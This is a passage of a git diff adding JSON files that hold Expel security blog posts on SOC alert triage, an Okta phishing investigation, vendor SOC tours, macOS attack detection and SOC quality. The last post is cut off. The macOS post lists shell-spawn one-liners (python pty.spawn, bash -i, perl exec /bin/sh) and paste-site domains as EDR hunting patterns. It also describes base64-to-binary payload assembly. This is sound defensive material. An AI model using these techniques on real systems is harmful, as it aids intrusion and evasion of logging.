\u00b7 BEN BRIGIDA AND DESHAWN LUU \u00b7 DEC 15, 2020 \u00b7 TAGS: MDR / SOC / Tech tools There aren\u2019t many jobs where highly motivated, competent and well-funded groups of people from all over the world are trying to trick you at every turn. But that\u2019s the reality for every SOC or MDR analyst. Change is constant; once the bad guys get caught enough times, they mix it up and evolve their tactics. And that\u2019s just the malicious stuff! Keep in mind that alerts flag activity on the network or endpoint that might be bad, which means the vast majority of alerts an analyst will look at throughout their career will most likely be completely benign. Analysts have to approach every alert with the same mindset and process. They don\u2019t know if the alert is malicious or benign when they start working. Their job is challenging enough; we don\u2019t want them to have to reinvent an investigation process for each and every alert too. So how do we ensure that our analysts are efficient and consistently performing high-quality decision making? That\u2019s where the Expel Workbench\u2122 managed alert process (MAP) comes in. How the process works TL;DR We set a goal to answer investigative questions with each alert We use the investigative process, \u201cOSCAR\u201d (which stands for orient, strategize, collect evidence, analyze and report), to answer those questions The decision path is how alerts move through our system as we investigate At Expel, we look at alerts across a diverse customer base on over 60 unique vendor technologies. There\u2019s a lot of variety. The good news for Expel analysts is that the goal, investigative process and alert workflow is consistent for every alert we review. The image below shows how we refer to each of these things and provides a quick summary as well. Expel Workbench managed alert process It starts by asking questions Why do we need to ask questions? Because attackers are creative. They evolve their methods, make decisions to evade detection and try to blend in. In our experience, an investigative runbook containing a rote set of steps is inflexible in the face of change and removes thinking and analysis from the process, which sooner or later results in missed attacker activity (and attackers make sure it\u2019s sooner). We need to give analysts the freedom to be creative when they need to be, while also providing guardrails to ensure each alert that we look at meets our standard of quality . The questions-based investigative process forces analysts to rely on critical thinking skills to assess what is actually happening in the alert. This gives analysts the space to analyze the activity and find novel attacker behaviors, and the flexibility to do it on the widest variety of alert signal. The Goal During alert triage, our goal is to answer the question: what is this activity? For every malicious event, we then seek to answer all five investigative questions: What is this activity? Where is it? When did it get here? How did it get here? What does the customer need to do? Expel\u2019s transparent platform, the Expel Workbench, allows customers to see what alerts were closed as benign and why. We can\u2019t get away with closing something benign without explaining why. Asking our analysts to focus on describing the purpose of the activity the alert is associated with helps them close alerts more confidently. This also allows customers or other analysts to understand the analysis that led to that conclusion. The Expel Workbench managed alert process First, let\u2019s cover the different ways an alert can travel through the system as analysts answer the investigative questions. This process breaks down into five buckets and maps to the investigative questions, shown in the image below: Alert Decision Pathway Here\u2019s exactly what our SOC analysts do during each phase of an investigation: Triage \u2013 Based on the information at hand, the analyst attempts to determine if the alert is benign (move to close) or malicious (move to incident). If the analyst requires more information to make a decision, they move the alert to a state called \u201cinvestigate.\u201d In the Triage and the Investigate state, analysts use the OSCAR investigative process to answer the first investigative question: what is this activity? Investigate \u2013 This is when we need more data to understand the activity. At this stage, Expel Workbench empowers the analyst to query any of the customers integrated security technology for additional information to help determine if the alert hit on malicious activity using \u201cinvestigative actions.\u201d Investigative actions use the security devices\u2019 APIs to acquire and format additional data in order to make a determination about whether the activity is malicious or benign. Investigative actions fall into two categories: query [indicator] and acquire [artifact]. Querying an indicator looks for an indicator in process events, network events, etc. Examples of investigative actions are query IP, query domain, query file, acquire file, query host and query user. Analysts can also run any of our Ruxie automated actions, such as \u201ctriage a suspicious login\u201d or \u201cGoogle Drive audit triage.\u201d (More on Ruxie later.) Incident \u2013 If we determine the activity is malicious, we declare a security incident and answer the remaining investigative questions which focus on determining the scope of the compromise \u2013 what the compromise is, when it started and how many hosts are affected. Close \u2013 If we determine the alert does not represent malicious activity, we close the alert from the triage stage or the investigation stage with a close category and a close reason. (Ex: Close Category \u2013 benign; Close Reason \u2013 No evidence of malicious activity was found. This activity is common in the environment and across our customer base, and is expected for this user\u2019s role. This is a known-good application.) Notify \u2013 If an analyst determines that the alert does not represent a compromise, but does represent interesting or potentially risky activity, they will notify the customer and provide the rationale for notification. Anything that appears malicious is promoted to an incident; closed alerts and investigations that are not promoted to incidents are implicitly not malicious. The investigative process, AKA OSCAR The Expel investigative process is based on a similar process developed by Sherri Davidof and Jonathan Ham, and discussed in the book \u201cNetwork Forensics Tracking Hackers through Cyberspace.\u201d It\u2019s an iterative process loosely based on the observe, orient, decide, act (OODA) loop and specifically tailored for cyber security investigations. Expel augments this process with technology that helps analysts document their work and guide them toward the next step in the investigation. It starts with an alert, which contains a set of information related to potentially malicious activity. The Expel Workbench provides a number of decision support tools to assist analysts during this process \u2013 customer context, automated workflows , data enrichment and investigative actions . (Keep an eye out for a future blog post about our decision support tools.) As a transparent security platform, we notify the customer throughout this journey based on configurable customer preferences. Our process looks like this: Expel Investigative Process Orient \u2013 Understand the purpose of the alert and the information available. We encourage analysts to answer the following four questions at this stage. What is this alert looking for? Where is this in an attack lifecycle (i.e. MITRE Tactics)? What context do I have? What alert data do I have? Strategize \u2013 Determine what additional questions need to be answered and where to look for the answers. Identify and prioritize what data is needed to answer the remaining investigative questions. Determine if you should involve additional resources or escalate to more senior members of the team. Collect Evidence \u2013 Acquire and parse the highest priority data. Analyze \u2013 Review the data to determine if you were able to answer the investigative questions: Does this answer what I want to know? Report \u2013 Final summary of the investigation: This is what I know. The OSCAR process is an iterative loop. As the analyst answers questions, they develop new questions and need to collect additional evidence until they are able to achieve the goal of answering our five investigative questions. The investigative questions (goal), decision path and investigative process don\u2019t change on a per-technology or per-operating system basis, even though the techniques used by the attacker and the format of the evidence do change. The Expel Workbench MAP in action Let\u2019s walk through the process for an alert on a Windows 10 workstation as an example. Phishing emails containing malicious attachments are one of the most common ways users get compromised, so let\u2019s take a look at how this all comes together for activity related to a macro-enabled document. We\u2019ll follow an alert through the decision path as we apply the Expel investigative process in order to answer the investigative questions, starting with: what is this activity? Orient The initial alert comes from a suspicious Microsoft Office suite process relationship. Expel Workbench alert What is the alert looking for? An attacker tricking the user into opening a malicious Microsoft Office document that uses macros to spawn a scripting interpreter, which downloads and executes a malicious script. Where is this in an attack lifecycle (i.e. MITRE Tactics)? Initial access / Phishing / Attachment Execution/User Execution/Malicious File Command and Scripting Interpreter What context do I have? Analytics in Expel Workbench tell us the alert doesn\u2019t fire often (<1 a day across all customers) and it frequently leads to investigations and incidents. Additionally, Expel\u2019s machine learning algorithms focused on PowerShell args have increased the alert severity. What alert data do I have? We have the following in the alert itself: Asset Details, Process Details (Process Tree, Process Arguments, etc), Network Connections, File Modifications and Registry Modifications. Strategize We want to determine what questions we need to answer and what data we need to get those answers. Is PowerShell reaching out to a website to download something? (Process Args) Are the PowerShell arguments suspicious? (Process Args) Is the domain suspicious/malicious? (Network Connections, Process Args, Open-source intelligence [OSINT]) Is the downloaded file suspicious/malicious? (File Writes, Network Connections, Packet capture [PCAP], Process Args, OSINT) Is the document that spawned PowerShell suspicious? (File Information, File Listing, Network Traffic, PCAP data) We then prioritize the review of available evidence and, if necessary, the acquisition of additional evidence. The prioritized list for this alert would be process args, network connections and additional OSINT to evaluate Domains and IPs. Collect Evidence In this investigation, the automated alert enrichment capabilities powered by our robot, Ruxie, have provided all required information in the alert details in Expel Workbench. Analyze The PowerShell argument is heavily obfuscated. We need to decode it. Ruxie can handle all the decoding for this particular alert, and will even disassemble the shell code. PowerShell Arg Using a search engine to look up the arguments from the decoded payload, it\u2019s easy to determine that the argument reads the shellcode into memory and executes it. This spawns network connections to the host EXAMPLE[.]com. Automation within the Expel Workbench, uses Greynoise and Ipinfo to evaluate the EXAMPLE[.]com domain against OSINT and determines that it has no web presence and is not known in OSINT repositories. Report Now we can answer the first question: what is this activity? We\u2019ve determined that a Microsoft Office document spawned a scripting interpreter (PowerShell) that connected to a suspicious site in order to download and execute an unknown script from memory. This is classic malicious downloader behavior \u2013 definitely bad. On the decision path, this alert would move from the triage phase directly to an incident. The process of moving the alert to an incident generates a notification for the customer. Time is of the essence for a malicious file, so we want to get them started on remediation even before we have finished answering the rest of the investigative questions. An example of the report we would generate for this instance is below. Commodity malware findings How the Expel Workbench managed alert process helps you The job of a SOC/MDR analyst is uniquely challenging. They go up against motivated and talented adversaries who constantly change tactics and environments. Analysts have to be constant learners . In order to foster creativity we believe it\u2019s important to define what the goal is, explain the stops on the journey and provide a framework that enables consistently thorough investigations. This process works well for our analysts, but it doesn\u2019t mean that the Expel Workbench managed alert process is a fail-safe. Improper application has the potential to lead to pitfalls and human error. That\u2019s why training a talented group of analysts to make sophisticated decisions matters. We\u2019ll be talking more about our analyst training and decision-making process in a future blog post. So stay tuned. Want to be notified when we share a new blog post? Subscribe to our EXE blogs and we\u2019ll send them directly to your inbox." +} \ No newline at end of file diff --git a/how-to-investigate-okta-compromise.json b/how-to-investigate-okta-compromise.json new file mode 100644 index 0000000000000000000000000000000000000000..bb52e9ac51a160f5b7c7ad81bc3d8f6711b99f75 --- /dev/null +++ b/how-to-investigate-okta-compromise.json @@ -0,0 +1,6 @@ +{ + "title": "How to investigate Okta compromise", + "url": "https://expel.com/blog/swimming-past-2fa-part-2-investigate-okta-compromise/", + "date": "Aug 31, 2021", + "contents": "Subscribe \u00d7 EXPEL BLOG Swimming past 2FA, part 2: How to investigate Okta compromise Security operations \u00b7 6 MIN READ \u00b7 ASHWIN RAMESH \u00b7 AUG 31, 2021 \u00b7 TAGS: Cloud security / MDR / Tech tools In the first post of this two-part series , we shared how our security operations center (SOC) spotted an Okta credentials phishing attack. Now we\u2019re going to do a deep dive into how we investigated the incident. Before we jump in, it\u2019s super important that we call out that you can prevent this type of attack by rolling out phish-resistant multi-factor authentication (MFA) like FIDO/WebAuthn in Okta . The tweet below, courtesy of @boblord is the right way to think about MFA. The man, the myth, the legend. Bob Lord ( @boblord ) and all of his wisdom. Okay, now let\u2019s talk about the investigation. A quick reminder that we can track the attacker\u2019s activity by looking into Okta\u2019s event logs. These logs contain all sorts of details like where a user is logging in from and what they\u2019re trying to authenticate \u2013 to name a few. Okta, by design, is an Identity and Access Management (IAM) platform used to delegate access to multiple applications used within an org. It uses the Single Sign On (SSO) authentication scheme to deleg\u200b\u200bate access. A compromised Okta account can lead to disastrous downstream effects, basically giving the attacker access to all the applications authorized for the victim. But there\u2019s good news: Okta maintains detailed event logs that we can search for using the Events API. In this blog post, I\u2019m going to walk you through the event logs we reviewed during our investigation, our decision-making process and how we used automation to discover what happened within five minutes. Diving into logs After we realized that we were dealing with a potential Okta phishing attack, we immediately started reviewing the customer\u2019s Okta logs. The image below shows an Okta event log. Notice the event type is \u201cuser.authentication.sso.\u201d This event describes a login to an authorized application using the SSO authentication schema. The application accessed by the threat actor was Google\u2019s application suite (G Suite). Okta log This means that the attacker could access the victim\u2019s G Suite applications that were authorized by their org. That\u2019s bad news. At this stage, we knew we needed to comb through all G Suite activity logs. Exfiltrating data is the primary goal for this type of attack. So we started by looking at the victim\u2019s Google Drive audit logs. To dig deeper into these logs, we filtered on the value \u201cdrive\u201d stored under the keyword \u201capplicationName\u201d within the event details. Below is an example log of the external threat actor snooping around the victim\u2019s Google Drive. Google drive audit log The \u201cevents\u201d block within the event details gives us a lot of information to work with. For example, we can see that the attacker downloaded a private document called \u201cpersonal credit card info.\u201d Here\u2019s a list of the event details that stood out to us, and what they mean: doc_title: This is the current title for the document. doc_type: This represents the document type \u2013 a DOCtype document in our example. Other possible values include folder, jpeg, mp4, pdf and spreadsheet. originating_app_id: This is the unique Google Cloud project ID of the application that performed the specific action. You can use the following resource to resolve the ID to a specific client . In our example, the ID `691301496089` represents the \u201cGoogle Drive Web\u201d client. owner: This is the email address of the file\u2019s owner. In some cases, the owner can be the name of the Team drive for items contained within a Team drive. primary_event: This is a flag indicating whether this action is a primary event, or an event generated as a side effect of an associated primary event. visibility: This field describes the visibility of the file within the organization. Some of the different types of visibility include private, people_with_link and public_in_the_domain. A detailed description of these keywords can be found on Google\u2019s developer page . Pulling it all together Let\u2019s connect Looking at the log event details helps us paint a picture of what the attacker was trying to accomplish. Based on what we reviewed above, we noticed that the attacker was trying to download a personal Word document called personal credit card info from the victim\u2019s Google Drive application. This tells us that the attacker was actively snooping around for sensitive information. And when we see things like this \u2013 it\u2019s time to alert the customer. We immediately gave them their first set of remediation actions: Reset the victim\u2019s credentials so the attacker can no longer use the compromised credentials. Force an account logout so the attacker can longer use Okta to sign into other authorized apps. Reset the account\u2019s active sessions so the attacker can\u2019t use existing access tokens to access authorized applications. But we\u2019re not done here. There are still a few unanswered questions we had to chase, like: What else did the attacker download? Did they access other applications? Are there any other victims? We could sift through the audit logs for Okta and Google Drive to answer these questions, but that would be a laborious process. By the time we\u2019re done, the attacker would have wreaked havoc in the org\u2019s network. That\u2019s why we\u2019re big believers in automating things that can be automated . Luckily, I work with a great crew of engineers and we created automated workflows for our analysts. Now let\u2019s explore how we use tech like Expel\u2019s bots to answer some of those questions above. Automating workflows Take it from me \u2013 sifting through logs in Excel is not easy on a hectic day. You can easily glance over key events and miss vital evidence during a security incident. Remember, every second you save helps keep your org safe from baddies. We use investigative actions to talk to the customer org\u2019s security devices. During an investigation, an analyst issues an investigative action by providing the right set of parameters to retrieve additional data for analysis. Below is an example of what entering these parameters into the Expel Workbench looks like. Query IP Investigative action being triggered to query for any events associated with the IP 192.168.0.1 And below is an example of what the results of the investigative action would look like in the Expel Workbench\u2122. Usually, the next step for the analyst is to either download the results and view them in Excel or view every event returned in the Expel Workbench data-viewer feature. The query IP investigative action returning results from the triggered API. During this investigation, we used our in-house bot, Ruxie\u2122, to create an investigative workflow to gather all Google Drive activity from the malicious IP. The results were formatted into an easily digestible report, which was uploaded to the Expel Workbench. Creating a workflow for Okta compromise Based on our investigation, we could tell that the attacker used the malicious IP 197.210.196.89. From there, we used the GCP Drive Audit Workflow to quickly arm the investigating analyst with additional leads into other actions performed by the malicious IP within the org\u2019s Google Drive application. Take a look below: Analyst triggering the GCP drive audit triage workflow. Once we enter the investigative action details, we get workflow outputs like what you see in the two images below. This lets us see if the IP was used to log into other compromised accounts, what files were accessed by the malicious IP and what actions were performed on them. Google Drive audit triage workflow output Within minutes, a list of file activity performed by the attacker from the malicious IP was uploaded to the Expel Workbench for the analyst to review. The attacker managed to access a few files. Based on the names of the files in the images above, it looks like they were looking for any document associated with the word \u201ccredit\u201d \u2013 fishing around for any sensitive data uploaded to the victim\u2019s Google Drive account. Once the analyst gathered this information, like with any investigation, we gave our customer a detailed report of the attacker\u2019s activity within their org and how to remediate. These reports include: A list of all the assets the attacker touched; A list of all compromised accounts observed within the org; The root cause or the initial attack vector (when possible); A list of remediation actions; and A list of resilience actions to stop future threats. Parting thoughts Reminder: Phish-resistant MFA like FIDO/WebAuthn is how you beat the bad actors here. It would have prevented this attack. Attackers are getting better day-by-day \u2013 like using phishing kits that can defeat legacy Time-Based One-Time Password (TOTP) and push-based 2FA. If this were to happen in your environment, the first thing you\u2019d want to do is remediate the account\u2019s credentials. However, the attacker might have already gotten the necessary access tokens to maintain their access in the victim\u2019s authorized applications. That\u2019s why we recommend you force an account logout, as well as clear all the current active sessions associated with the account. I hope you found this two-part blog series helpful. Still have questions about how we tackle phishing here at Expel? Find out more here !" +} \ No newline at end of file diff --git a/how-to-make-the-most-of-your-virtual-soc-tour.json b/how-to-make-the-most-of-your-virtual-soc-tour.json new file mode 100644 index 0000000000000000000000000000000000000000..1a373b5ac181f1a96c80ec31377d489f00b7e9ed --- /dev/null +++ b/how-to-make-the-most-of-your-virtual-soc-tour.json @@ -0,0 +1,6 @@ +{ + "title": "How to make the most of your virtual SOC tour", + "url": "https://expel.com/blog/how-to-make-the-most-of-your-virtual-soc-tour/", + "date": "Apr 20, 2021", + "contents": "Subscribe \u00d7 EXPEL BLOG How to make the most of your virtual SOC tour Security operations \u00b7 3 MIN READ \u00b7 TYLER FORNES \u00b7 APR 20, 2021 \u00b7 TAGS: Guide / SOC Since 2020 and 2021 are apparently The Year (Years?) of Zoom, we\u2019re scrapping the in-person things that once felt like must-dos, like booking a plane ticket to meet face-to-face with that new vendor you\u2019re evaluating. In pre-pandemic days, we invited prospects to physically come and visit our headquarters and Security Operations Center (SOC). They got to tour our SOC, meet the team, chat with our execs and get a feel as to whether Expel was the right security partner for their org. In fact, we used to even give prospects a pre-read before coming to see us in Herndon. It wasn\u2019t the usual marketing fluff you\u2019d expect to receive; instead, it was a laundry list of recommendations for how to pressure test a potential security provider during the visit. Thanks to our new Zoom-first environment, we decided to create a new, completely virtual way to give prospects a strong sense of what working with Expel would really be like. Enter Expel\u2019s Virtual SOC tour. What\u2019s a virtual SOC tour? Our virtual SOC tour is exactly what it sounds like \u2013 we\u2019ve tried to recreate that former in-person experience to give our prospects a solid look at who we are and how we can support them. This behind-the-scenes look gives you a chance to: Meet our experts, including our CEO and at least one of our lead SOC analysts Get an understanding of what transparency means to Expel Learn what to expect as an Expel customer and how we\u2019d work with your team Ask all your burning questions How to prepare for your virtual SOC tour While there\u2019s nothing you have to do to prepare \u2013 the process is truly as simple as signing up and showing up from behind your computer screen \u2013 we like to share a few tips that\u2019ll help you get the most out of a virtual SOC tour. We think these are useful things to do whether you\u2019re meeting with us or another vendor. First, preparation is key. Go into the conversation knowing when you want to buy, what you want to pay and which SOC \u201cfeatures\u201d are must-haves for you and your team (24\u00d77 monitoring? Phishing support? Something else?). In addition to preparing and knowing what you want out of the meeting, come ready with a list of questions that\u2019ll help you truly get an understanding for how the vendor operates. Here are the things we think you should ask about as you\u2019re \u201ctouring\u201d with a potential new security partner. 5 questions to ask during your virtual SOC tour #1: \u201cCan I talk to a handful of your customers?\u201d You\u2019ll get a higher fidelity picture of customer life by talking to customers. (Shocking, right?) During a SOC tour, you\u2019ll likely be shown what the provider wants you to see by default. What we at Expel want you to see may be different than our competitors, but it will still be what we want you to see. Don\u2019t let a potential provider get away with that. If possible, line up the customer chats before (or shortly after) the virtual SOC tour. #2: \u201cIn the past 12 months, what third-party integrations have you done? Which features did you release and why?\u201d A vendor\u2019s plans for the future are well and good \u2026 and necessary. However, consider asking about what they\u2019ve built in the past. You know how you ask about work history when you\u2019re hiring someone? The same thing applies here, as past behavior is a great predictor of future action. Can the vendor answer questions about what they\u2019ve built so far? Can they tell you why they made the decisions they did? This will tell you a lot in a short time. #3: \u201cHow will you help take [annoying thing your team doesn\u2019t enjoy] off my plate?\u201d Be selfish. There are other things you want to get done besides the mundane day-to-day of security operations. What are the tasks you don\u2019t want to have to worry about? What would make you and your security team happy? (Yes, you can say \u201csecurity\u201d and \u201chappy\u201d in the same sentence.) #4: \u201cCan I see some deliverables?\u201d You\u2019ll definitely want to see some deliverables. These obviously have to be scrubbed, so asking in advance is important. In addition to asking for deliverables, ask to see what it looks like when something goes wrong. What does that communication loop look like? Because something will go wrong. Anyone who says otherwise is lying. #5: \u201cCan I set up some additional time to meet 1:1 with a shift analyst?\u201d Time to ask for something off script. During the virtual SOC tour, ask if you can spend a bit of time with a shift analyst \u2013 someone on the pointy end of the spear whose responsibility is providing service. If your request is met with anything but a resounding \u201cyes,\u201d that\u2019s a warning sign. When you talk to the analyst, have a conversation to find out what it\u2019s really like to work at the provider. Do you leave the chat wanting to hire them? That\u2019s telling. Make your potential provider uncomfortable Visiting your current \u2026 or would be \u2026 managed security provider can be a telling experience. It\u2019s the best way to separate fact from fiction and see what you\u2019re buying first hand. In addition to the mechanical requirements \u2013 like seeing the SOC, getting the security program presentation and peeking at the roadmap \u2013 think about evaluating the truth in between the lines. Want to join one of Expel\u2019s virtual SOC tours? Send us a note ." +} \ No newline at end of file diff --git a/how-to-make-your-org-more-resilient-to-common-mac-os.json b/how-to-make-your-org-more-resilient-to-common-mac-os.json new file mode 100644 index 0000000000000000000000000000000000000000..082cb60feefb53ec2af9584aeacf8ba2db3da747 --- /dev/null +++ b/how-to-make-your-org-more-resilient-to-common-mac-os.json @@ -0,0 +1,6 @@ +{ + "title": "How to make your org more resilient to common Mac OS ...", + "url": "https://expel.com/blog/how-to-make-org-more-resilient-common-mac-os-attacks/", + "date": "Jul 23, 2019", + "contents": "Subscribe \u00d7 EXPEL BLOG How to make your org more resilient to common Mac OS attacks Security operations \u00b7 6 MIN READ \u00b7 ANDREW PRITCHETT \u00b7 JUL 23, 2019 \u00b7 TAGS: EDR / Get technical / How to / Hunting / Vulnerability I remember when I got my first MacBook. My first \u201cmalware-less\u201d computer , I thought to myself. Fast forward a few years to when I started working in the information security world and my feelings of invincibility depreciated pretty rapidly. Although Mac OS attacks occur less often than Windows OS attacks, the implications of an attack happening on either OS can be lethal. If you work in cybersecurity, you know that attack trends are a thing. There\u2019s always some new hotness in attacker Tactics, Techniques, and Procedures (TTPs), which often parallels the TTPs of security red teamers. Why? Well, when you see something that works, why reinvent the wheel? At Expel, we\u2019re seeing more and more orgs utilizing Mac OS, yet there\u2019s still little discussion about practical enterprise security for Mac OS. But because plenty of our customers run Mac OS systems, we\u2019re calling attention to a few recent attack trends we\u2019re seeing and how you can make your org (and devices) more resilient. Recent Mac OS activity and detections There are two TTPs I\u2019ve seen recently that target Mac OS. The first involves the use of persistent interactive scripting interpreters to evade command line auditing. The second involves the use of launchd persistence to download encoded text and compile the encoded text into binary in order to evade perimeter content-based filtering and host-based AV. Using encoded commands from PowerShell is an effective technique that\u2019s been used by Windows attackers for a long time \u2026 Macs are no longer immune. Technique 1: Execution of persistent interactive scripting interpreters: What is it? Like PowerShell and CMD with Windows, what\u2019s a Mac without Bash and Python? Plenty of people love Python because you can use it as both a scripting interpreter and an interactive console. The only downside? Some of the features we love about Python also make it a security threat. For instance, I love how I can quickly write a Python script to conduct common Bash-like functions like making new files and directories. However, if you want to use the Bash syntax we all know and love, you can invoke Bash directly from Python and execute a command within an interactive Bash console. Using Bash, the ability to execute commands are nearly limitless on a Mac. Immediately following successful lateral movement to a Mac OS host, I\u2019ve seen attackers use \u201c/bin/bash\u201d to execute \u201c/usr/bin/nohup\u201d with parameters for an interactive Python console. If you\u2019re not familiar with the native BSD utility, the \u201cnohup\u201d utility invokes another utility \u2014 in this case it\u2019s Python \u2014 with its arguments and tells your system to ignore the \u201cSIGHUP\u201d signal. This is a problem because \u201cnohup\u201d allows the utility to remain active and hidden in the background even after a user signs out. Using Python, attackers then execute another interactive Bash terminal. He or she uses that interactive Bash terminal to execute Curl \u2014 which lets him or her download malicious shellcode from an online code repository like GitHub or Paste Code. Once the attacker gets his or her hands on the data they\u2019re looking for, that data is then executed locally. The acquired data is either exploit payloads like keyloggers and Keychain dumpers, or utilities to further the attacker\u2019s mission like media streamers for data exfiltration. The process looks something like this: Though this technique doesn\u2019t make it impossible to detect malicious activity, it definitely helps obscure the attacker\u2019s activity. For example: 1. Following the compromise of a user account with sudo permissions, an attacker executes a Python console which spawns another Bash under root context. 2. The attacker uses a utility such as Curl to download raw text, using it as shell code or converting it to binary. 3. The shell code or binary code is executed under root context. 4. Now the Bash history for the Curl activity mentioned above isn\u2019t in the user\u2019s \u201c.bash_history\u201d file or \u201c/var/root/.sh_history.\u201d And it\u2019s not mentioned in the Mac OS unified logs. So the crafty attacker goes undetected. How do you detect this type of attack? To detect this type of activity on your network, your best bet is to look at your Endpoint Detection and Response (EDR) tech recording process activity from the kernel level. Using your EDR, look for common code syntax to spawn a TTY shell from another shell. Try any of the following queries: python -c \u2018import pty; pty.spawn(\u201c/bin/sh\u201d)\u2019 python -c \u2018import pty; pty.spawn(\u201c/bin/bash\u201d)\u2019 bash -i /bin/sh -i perl \u2014e \u2018exec \u201c/bin/sh\u201d;\u2019 ruby: exec \u201c/bin/sh\u201d You can also look for any of these processes as parent of a TTY shell: vi (or) vim nmap python perl ruby Java The next step in the process is to look for instances where the child process is a parent of \u201ccurl\u201d or \u201cwget,\u201d and where the process arguments point to an online code repository. Here are some examples of code repository domains that \u2014 in this context \u2014 should raise a red flag: paste[.]ofcode[.]org pastecode[.]xyz pastiebin[.]com paste[.]org raw[.]githubusercontent[.]com wstools[.]io gist[.]github[.]com pasted[.]co etherpad[.]org Snipplr[.]com By running the activities above using Carbon Black Response (one of the EDR techs that some of our customers use), I produced this recorded process tree: Looking at the curl process arguments resulting from the child bash shell, there\u2019s a command line argument noting a download from \u201craw[.]githubusercontent[.]com\u201d: How do I protect my org from this kind of attack in the future? 1. Determine if your engineering team has a business and/or production justification for granting any employees access to any of the online code repositories referenced above. If not, black list the domains using your network permeter tech. 2. Use your EDR tech to set up a recurring hunt or custom detection to monitor for the activity discussed above. 3. Consider restricting standard user accounts from using \u201csudo\u201d or \u201croot,\u201d or implement a privilege control service like \u201cMake Me Admin\u201d or \u201cPrivileges.app\u201d so that user accounts can only be elevated to administrator level on a temporary basis. 4. If you don\u2019t have an EDR, go get one. Relying on local host-based detection is risky at best \u2014 without an EDR, it\u2019s easy to miss this type of activity. Technique 2: Launchd persistence to download encoded text What is it? I first saw this technique used by a sophisticated commodity malware masquerading as a legit media update. When an unsuspecting user tries to update the tech, the malware establishes persistence via \u201claunchd\u201d and creates and executes a randomly named sub-process from \u201c/private/tmp.\u201d Launchd allows an attacker to continually execute the malicious app every time a user logs on. Even if the user kills and deletes the processes running from \u201c/private/tmp\u201d the malicious process recreates the \u201c/private/tmp\u201d process again following a successful logon. The sub-process running from \u201c/private/tmp\u201d then executes \u201c/bin/bash\u201d and is followed by a series of strategic bash commands to assemble a malicious binary from raw text. A sub-process uses \u201c/bin/bash\u201d to pass a block of encoded text in an anonymous pipe which is then decoded by executing \u201c/usr/bin/base64.\u201d The decoded value is passed back through the anonymous pipe to \u201cxxd\u201d and formatted into hex. Once in hex, it\u2019s then reverted from hex to binary. The resulting malicious binary is then executed on the local host while leaving no evidence of a binary download at the perimeter of the network. The process looks like this: How do you detect this type of attack? Just like the first attack I described, your EDR tech is your best friend for detecting this one. However, identifying the specific commands executed by the attacker is a multi-step (aka not quick) process. Why? Because of the way that the kernel assigns the \u201cfile system value\u201d in place of the actual value being passed in the anonymous pipe. The screenshot below shows an actual process tree of an attacker attempting this technique as recorded by Crowdstrike Falcon . The command line for base64 specifies to decode (\u201c\u2013decode\u201d) the encoded value (\u201c/dev/fd/63\u201d). The encoded value is actually a base64 string, but you can\u2019t see the true value the attacker is attempting to decode. This creates an extra step for analysts in the investigation process. How can you discover that an attacker is storing data in an anonymous pipe? Use your EDR tech to look for processes with \u201c/dev/fd/63\u201d in command line arguments, especially if the process has the ability to encode, decode, archive or compile binaries. The occurrence of \u201c/dev/fd/63\u201d is not that common; however, you\u2019ll run into false positives. Once you find a couple suspicious processes with \u201c/dev/fd/63,\u201d make note of the process names, command lines, hosts and users associated with them. Now use your EDR technology to either \u201ctail\u201d or \u201cgrep\u201d the user\u2019s Bash history file for the process name and command line which included \u201c/dev/fd/63\u201d in its command line arguments. Here\u2019s how to do it using Carbon Black Response : 1. Use your EDR tech to get a copy of the user\u2019s bash history file: 2. Download the Bash history file and use a combination of \u201ctail\u201d and \u201cgrep\u201d to identify the process \u2014 in this case \u201cbase64\u201d \u2014 command which generated the recorded activity by your EDR tech: 3. The long base64 string follows the \u201c\u2013decode\u201d argument. You can use any number of tools or utilities, including \u201cbase64\u201d, to safely decode the string and find out what the attacker was trying to do. How do I protect my org from this kind of attack in the future? To make your org more resilient to this type of technique in the future, use your EDR tech to set up a recurring hunt or custom detection to monitor for processes with \u201c/dev/fd/63\u201d in command line arguments, especially if the process has the ability to encode, decode, archive or compile binaries. Then follow the suggested triage steps above. Need some help setting up a new hunt? Read our post on getting started with threat hunting . Bonus tip: all of these resilience actions will benefit your company\u2019s security posture if you\u2019ve got Linux hosts in your environment, too. Conclusion Whether its commodity malware or obfuscated command execution on Mac OS that keeps you up at night, there are some easy steps to take for detecting and triaging the problems \u2026 and keeping them from happening again. Have questions about detecting attacks on Mac OS, or want to know more about hunting for these types of threats? Send us a note ." +} \ No newline at end of file diff --git a/how-to-measure-soc-quality.json b/how-to-measure-soc-quality.json new file mode 100644 index 0000000000000000000000000000000000000000..77cea064505a830d0237c6c09a1a738082ab867c --- /dev/null +++ b/how-to-measure-soc-quality.json @@ -0,0 +1,6 @@ +{ + "title": "How to measure SOC quality", + "url": "https://expel.com/blog/how-to-measure-soc-quality/", + "date": "Jun 2, 2021", + "contents": "Subscribe \u00d7 EXPEL BLOG How to measure SOC quality Security operations \u00b7 8 MIN READ \u00b7 MATT PETERS AND JON HENCINSKI \u00b7 JUN 2, 2021 \u00b7 TAGS: MDR / Metrics / Tech tools There\u2019s a common assumption that there will always be tradeoffs between scale and quality. When we set out to build our security operations center (SOC) here at Expel, we didn\u2019t want to trade quality for efficiency \u2013 it just didn\u2019t feel right. So, when we started the team we pledged that quality and scale would increase together. Our team\u2019s response: challenge accepted. That commitment to quality now extends to every aspect of our operations \u2013 our customers can see everything we do. So our work has to be fast and it\u2019s got to be good. In previous posts, we\u2019ve talked a lot about how we\u2019ve scaled our SOC with automation . This is something of a sweet spot for us \u2013 we\u2019ve had some pretty good wins and learned a ton about metrics along the way. In this post, we\u2019re going to walk you through the quality end of the equation \u2013 how we measure and manage quality in our SOC. Along the way, we\u2019ll share a bit about the problems we\u2019ve encountered, how we\u2019ve thought about them and some of our guiding principles. TL;DR: quality is not based on what you assert, it\u2019s based on what you accept. It\u2019s not enough to say, \u201cWe\u2019re going to do lean six sigma\u201d \u2013 you have to inspect the work. And it\u2019s how you inspect the work that matters. A super quick primer on quality If you\u2019re new to quality and need a quick primer, read along. For folks who already know the difference between quality assurance and quality control, feel free to jump ahead. There are two key quality activities: quality assurance (QA) which is meant to prevent defects, and quality control (QC) which is used to detect them once they\u2019ve happened. In a SOC, QA are the improvements you build into your process. It\u2019s anything from a person asking, \u201cHey, can I get a peer review of this report?\u201d to an automated check (in our case, our bots) saying, \u201cTuning this alert will drop 250 thousand other alerts, are you sure?\u201d You probably have a ton of these checks in your SOC even if you don\u2019t call them QA. They\u2019re likely a build up of \u201cfix this\u201d, \u201cnow fix that\u201d type lessons learned. QC is a bit different. It measures the output of the process against an ideal. For example, in a lumber yard, newly milled boards are checked for the correct dimensions before they\u2019re loaded onto a truck. Quality control consists of three main components: What 